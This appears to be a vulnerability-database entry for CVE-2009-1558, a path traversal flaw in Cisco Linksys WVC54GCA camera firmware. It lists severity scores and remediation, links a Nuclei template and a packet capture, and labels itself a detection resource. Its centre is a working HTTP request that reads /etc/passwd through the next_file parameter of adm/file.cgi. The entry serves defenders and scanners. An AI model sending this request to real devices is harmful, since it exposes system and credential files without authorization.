🔙 목록으로 돌아가기

CVE-2009-1558: Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion

TitleCisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.
RemediationApply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability.
CVSS Score7.8
EPSS Score0.09101
CVE IDCVE-2009-1558
CWE IDCWE-22
Tags cve2009 cve iot linksys camera traversal lfi cisco firmware edb vkev vuln

🔍 Vulnerability Description

Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.

🌐 HTTP Request

GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-1558.yaml

🦈 Packet Capture: ⬇️ Download cve-2009-1558.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A